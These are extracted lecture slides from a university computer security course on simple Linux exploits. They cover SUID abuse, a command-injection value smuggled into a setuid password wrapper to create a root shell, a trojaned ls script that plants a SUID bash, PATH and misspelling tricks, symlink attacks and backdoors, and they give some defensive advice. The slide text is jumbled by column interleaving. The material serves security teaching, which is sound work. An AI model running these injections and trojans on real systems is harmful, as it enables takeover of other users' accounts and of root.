sign in sign up
<<
Home , Cp (Unix), Ln (Unix), Passwd, Su (Unix)

What do Hackers Want?

Simple Exploits o Your data: credit card number, financial information, SSN, personal information. o Your disk: pirated software (warez), illegal copies of movies/videos, porn, ...

Thursday/Monday, October 16/20, 2014 o Your CPU (e.g. to crack ) Reading: Hacking Exposed o Your bandwidth: send spam, participate in botnet, stepping stone to other attacks. CS342 Computer Security o To deny resources to you or your customers: for

blackmail, competition, revenge. Department of Computer Science Wellesley College o ⇒ To own (pwn)/root your machine (or least your account) by exploiting vulnerabilities.

Simple Exploits 12-2

Overview Essence of Exploits

Goal: discuss typical vulnerabilities & exploits in Linux. o Study details/assumptions of system Understand these for PS4 Treasure Hunt problem! o elevation of privilege o Take advantage of details and violate assumptions! o exploits (recall the Hacker Curriculum and Security Mindset).

o incorrectly set permissions o US Postal System examples; (Note: do not try these!) o leveraging SUID/SGID programs o code injection • Can you send a letter without a stamp? o trojaned commands • Can you reuse a stamp? o exploits o misspelling exploit o symbolic exploits o document exploits o backdoor rootshells

Simple Exploits 12-3 Simple Exploits 12-4 Elevation of Privilege Password Exploits

Holy grail = rootshell, but the path there may be circuitious. If I know your password, I can be you on your computer. Also, may only need to get partially there. o for passwords "sent in the " on network (especially wireless) guest o passwords stored unprotected on computer, perhaps in public files, emails, code, comments, logs, .bash_history, etc. The student permissions on some of these files might be set incorrectly. o Online password guessing (perhaps using knowledge of victim). faculty o Offline (e.g. ) -- must be able to read password . sysadmin o Use passwords from keystroke logger o Social engineering: shoulder surfing, trick people to divulge root passwords, look at postits near computer, dumpster diving

Simple Exploits 12-5 Simple Exploits 12-6

.bash_history file Use the source, Luke!

"wendy@cs342-ubuntu-1:~$ ~/.bash_history Try to find and study the source code for potentially emacs – guest vulnerable programs: su – foo o In code, may find vulnerabilities like overflowable sudo emacs & buffers, overflowable numbers, code injection, wendy@cs342-ubuntu-1:~$ -al ~/.bash_history hardwired accounts and passwords, etc. -rw------1 wendy wendy 68 Sep 16 08:59 /homewendy/.bash_history o In comments, may find notes on potential vulnerabilities, passwords, etc. o Permissions are sometimes incorrectly set, so others can view this file. o Sometimes contains information valuable for attacker (e.g., passwords typed “out of phase”) o Sometimes contains forensic information for understanding an attack.

Simple Exploits 12-7 Simple Exploits 12-8 SUID and SGID Program Attacks Simple SUID Example: mycat o Use Linux find command to find all accessible SUID and SGID o lynux creates a secret file programs – prime targets for privilege escalation. [lynux@salmon exploits]$ "This is lynux's secret file" > secret.txt o Find source code for these programs to look for vulnerabilities. [lynux@salmon exploits]$ 750 secret.txt o Disassemble and study object code. o To SUID programs, user lynux makes an SUID of cat named o Use strace to study system calls made (don’t forget –f flag) mycat. Forgets to change permissions back. o Use Linux command to see strings in object code (e.g. [lynux@salmon exploits]$ cat prompts, messages, error messages, system functions linked /bin/cat to, etc.) [lynux@salmon exploits]$ /bin/cat mycat; chmod u+s mycat: ls -l mycat -rwsr-xr-x. 1 lynux lynux 48040 Sep 25 15:39 mycat o Experiment with SUID/SGID programs to find & exploit vulnerabilities: o Attacker gdome uses mycat to read lynuxs secret file • Use gleaned knowledge to craft diabolical inputs (for buffer [gdome@salmon exploits]$ cat secret.txt overflows, code injection, etc.) cat: secret.txt: Permission denied • Try boundary case and out-of-range inputs (e.g., negative [gdome@salmon exploits]$ ./mycat secret.txt numbers, large numbers, empty string, very long strings) This is lynux's secret file Simple Exploits 12-9 Simple Exploits 12-10

Another SUID Example Code Injection Exploits o User lynux writes SUID program ~/bin/submit username psetfile Bad guys can take advantage of shoddy input handling to execute arbitrary code as someone else. to submit student pset data files to ~/psets/username/psetfile. o mangling from previous example. o The code for submit is essentially o Inject Linux commands into C programs that execute strings constructed the contents of psetfile to the file whose name is the from user input. concatentation ~/psets/ + username + / + psetfile o Inject HTML and JavaScript into web pages that include user input in page (e.g., original Tanner photo contest site). o What kind of attacks can be made with this program? o Inject database commands into SQL programs: e.g., xkcd's "Exploits of a Mom": http://xkcd.com/327/

Simple Exploits 12-11 Simple Exploits 12-12 Code Injection: newpasswd Example Code Injection: newpasswd Example part 2 Suppose root tries to command-line passwords (only available to Next, the machinations to make newpasswd : root) available to everyone via a setuid script:

#!/bin/bash –p // Contents of /root/newpasswd.c # contents of /root/newpasswd.sh int main (int argc, char* argv) { echo "Executing /root/newpasswd.sh" execv("/root/newpasswd.sh", argv); echo $1 | /usr/bin/ --stdin `` } o In raw C, can use system to execute string argument in a : system ”echo $1 | /usr/bin/passwd --stdin `whoami`” [root@localhost ~]# gcc -o newpasswd newpasswd.c o Other ways to construct and execute code out of parts on the fly: [root@localhost ~]# cp newpasswd /usr/bin/newpasswd • C’s exec, execv, and execve [root@localhost ~]# chmod 4755 /usr/bin/newpasswd • eval in JavaScript, Python, PHP, Perl, and Lisp [root@localhost ~]$ ls -l /usr/bin/newpasswd o This code won't really work anyway because /usr/bin/passwd only -rwsr-xr-x 1 root root 4832 2008-09-23 06:16 /usr/bin/newpasswd allows the --stdin option for real UID root, not for effective UID root. But let's suppose root doesn't know this. o Ubuntu doesn’t support –-stdin option (but some other Linuxes do) Simple Exploits 12-13 Simple Exploits 12-14

Code Injection: newpasswd Example part 3 Code Injection: newpasswd Example part 4

Now gdome tries out newpasswd: [gdome@localhost ~]$ newpasswd foo; cp /bin/bash ~gdome/ mine; chmod 4755 ~gdome/mine; echo bar" [gdome@localhost ~]$ newpasswd foobar Executing /root/newpasswd.sh Executing /root/newpasswd.sh foo Only root can do that. Only root can do that.

The underlying /usr/bin/passwd fails because real UID gdome != root. [gdome@localhost ~]$ ls -l mine But gdome can still do sneaky things! -rwsr-xr-x 1 root gdome 735004 2008-09-23 06:04 mine

[gdome@localhost ~]$ newpasswd foo; echo bar; echo baz" [gdome@localhost ~]$ ./mine -p Executing /root/newpasswd.sh mine-3.2# whoami foo root bar Only root can do that.

Simple Exploits 12-15 Simple Exploits 12-16 Preventing Code Injection Exploits Trojaned ls program o Dont directly execute input or embed it in system contexts #!/bin/bash (like ). # gdomes ~/bin/ls_trojan program o If you must use user input directly, first either # Make suid shell in /tmp/foo cp /bin/bash /tmp/foo • Verify that input doesnt contain problematic parts: chmod 4755 /tmp/foo ! semicolons in Linux commands # Now do what ls does ! .. or starting / in filenames exec ls "$@ ! unmatched string quotes, angle brackets (HTML), parens (Javascript) Now gdome tries to trick other users into running ! Code fragments (HTML, Javascript, …) her ls program in place of regular ls.

• Sanitize input to remove problematic parts. Path attacks are one way to do this.

Simple Exploits 12-17 Simple Exploits 12-18

Linux PATH variable: Prelude to An Exploit Overriding PATH with Absolute Pathnames Linux uses PATH variable to find executables. (This variable is set/changed in Can override PATH mechanism by giving absolute pathname ~/.bash_profile, ~/.bashrc) [lynux@localhost ~]$ which ~/bin/passwd [lynux@localhost ~]$ echo $PATH /usr//bin:/usr/local/bin:/usr/bin:/bin:.:/home/lynux/bin:. ~/bin/passwd

Linux searches PATH in order to find an executable for a relative [gdome@localhost setuid]$ echo $PATH (non-absolute) pathname. Can see what it finds with which command. /usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/home/gdome/bin

[lynux@localhost ~]$ which passwd /usr/bin/passwd [gdome@localhost setuid]$ which rootshell [lynux@localhost ~]$ which ls /usr/bin/which: no rootshell in (/usr/kerberos/bin:/usr/local/bin: /bin/ls /bin:/usr/bin:/home/gdome/bin) [lynux@localhost ~]$ which findit ~/bin/findit [gdome@localhost setuid]$ which ./rootshell [lynux@localhost ~]$ which rootshell ./rootshell /usr/bin/which: no rootshell in (/usr/kerberos/bin:/usr/local/bin:/usr/bin: /bin:.:/home/lynux/bin:.)

[lynux@localhost ~]$ ~/cs342/download/setuid/ [lynux@localhost setuid]$ which rootshell ./rootshell Simple Exploits 12-19 Simple Exploits 12-20 Linux Path Exploit: PATH begins with . Avoiding Linux Path Exploit

Suppose "." is at the beginning of PATH: Can avoid the above attack by putting "." at end of PATH or excluding it altogether. [lynux@localhost ~]$ export PATH=.:$PATH; echo $PATH .:/usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:.:/home/lynux/bin ... lynux in a new shell after moving . to end of PATH …

Nefarious gdome can trick lynux into running her trojaned ls program: [lynux@localhost ~]$ echo $PATH /usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:/home/lynux/bin:. [gdome@localhost ~]$ cp ~/bin/ls_trojan ~/public_html/ls [lynux@localhost ~]$ cd ~gdome/public_html/; ls -l index.html [lynux@localhost ~]$ cd ~gdome/public_html/ -rwxrwxr-x 1 gdome gdome 34 2008-09-16 05:09 index.html [lynux@localhost public_html]$ which ls [gdome@localhost ~]$ ls -al /tmp/foo /bin/ls -rwsr-xr-x 1 lynux lynux 735004 2008-09-19 07:47 /tmp/foo

[gdome@localhost ~]$ /tmp/foo –p foo-3.2$ whoami lynux

Simple Exploits 12-21 Simple Exploits 12-22

Misspelling Exploit Symbolic Links in Linux

Even if "." at end of PATH, still subject to misspelling attacks. Make "aliases" in Linux via symbolic links: -s oldname newname

[gdome@localhost ~]$ cp ~/bin/ls_trojan ~/public_html/sl [lynux@localhost ~]$ cd ~/bin

Then can still have trouble if lynux mistypes "ls" as "sl": [lynux@localhost bin]$ ln -s /usr/java/jdk1.6.0_06/bin/java java1.6

[lynux@localhost ~]$ cd ~gdome/public_html/; sl -l index.html [lynux@localhost ~]$ cd ~ -rwxrwxr-x 1 gdome gdome 34 2008-09-16 05:09 index.html [lynux@localhost ~]$ which java1.6 (Or: could modify sl to print bash: sl: command not found ) ~/bin/java1.6 [gdome@localhost ~]$ ls -al /tmp/foo -rwsr-xr-x 1 lynux lynux 735004 2008-09-19 07:47 /tmp/foo [lynux@localhost ~]$ java1.6 -version java version "1.6.0_06" [gdome@localhost ~]$ /tmp/foo –p Java(TM) SE Runtime Environment (build 1.6.0_06-b02) foo-3.2$ whoami Java HotSpot(TM) Client VM (build 10.0-b22, mixed mode, sharing) lynux

Simple Exploits 12-23 Simple Exploits 12-24 Exploit: Part 1 Symbolic Link Exploit: Part 2

Could anything go wrong with the following? Suppose gdome did the following *before* lynux's operations: [lynux@localhost ~]$ cat personal.txt [gdome@localhost ~]$ lynsecret My credit card number is 1234 5678 1011 1213 [gdome@localhost ~]$ chmod 777 lynsecret [lynux@localhost ~]$ cp personal.txt ~/tmp/saved [gdome@localhost ~]$ cd ~lynux/tmp ... lyunx does some other operations ... [gdome@localhost tmp]$ ln -s /home/gdome/lynsecret saved [lynux@localhost ~]$ cp ~/tmp/saved personal.txt Then gdome now knows lynux's secret after lynuxs operations! [lynux@localhost ~]$ ~/tmp/saved [gdome@localhost tmp]$ cat ~/lynsecret Suppose the permissions on tmp are: My credit card number is 1234 5678 1011 1213

This trick can be used to access files written by root to system [lynux@localhost ~]$ ls -al tmp /tmp ! total 48 drwxrwxr-x 2 lynux cs342stu 4096 2008-09-19 08:57 . How to avoid this attack? …

Simple Exploits 12-25 Simple Exploits 12-26

Maintaining Access (HLE Ch. 10) Document Exploits Once a hacker has rooted your machine, what can they do to maintain o Examine metadata, comments, change-tracking records access for the future? of MS Word doc. o Leave behind “backdoor” rootshells o In redacted documents, look for redacted elements. o Trojaned system programs. E.g.: • change passwd , sudo, etc. to record passwords & send to attacker. o Remove saving/printing restrictions from PDF • make /cat setuid/setgid to allow reading of any file. document. • change safe program to be vulnerable to a code injection attack, o Examine metadata in images/video (, possibly buffer overflow attack, etc. location, …) • install keystroke logger (keylogger) • many such Trojaned binaries often bundled into rootkits that hide o Digital watermarks on documents and images. their existence by changing basic commands like ls, . o For more details, see: o Change system configuration files, E.g., • hosts .allow & hosts.deny: control which clients are allowed to connect • S&M Ch. 13 Office Tools and Security to a machine. • Abelson, Ledeen, & Lewis Blown To Bits, Ch. 4: Ghosts in the • httpd.conf: configures HTTP server, including various security Machine – Secrets and Surprises of Electronic Documents. settings.

Simple Exploits 12-27 Simple Exploits 12-28 Other Attacks Well Study o Buffer overflow attacks o Format string attacks o Cross-site scripting o Drive-by downloads o Network attacks o Malware: viruses, worms, Trojans, rootkits, spyware

Simple Exploits 12-29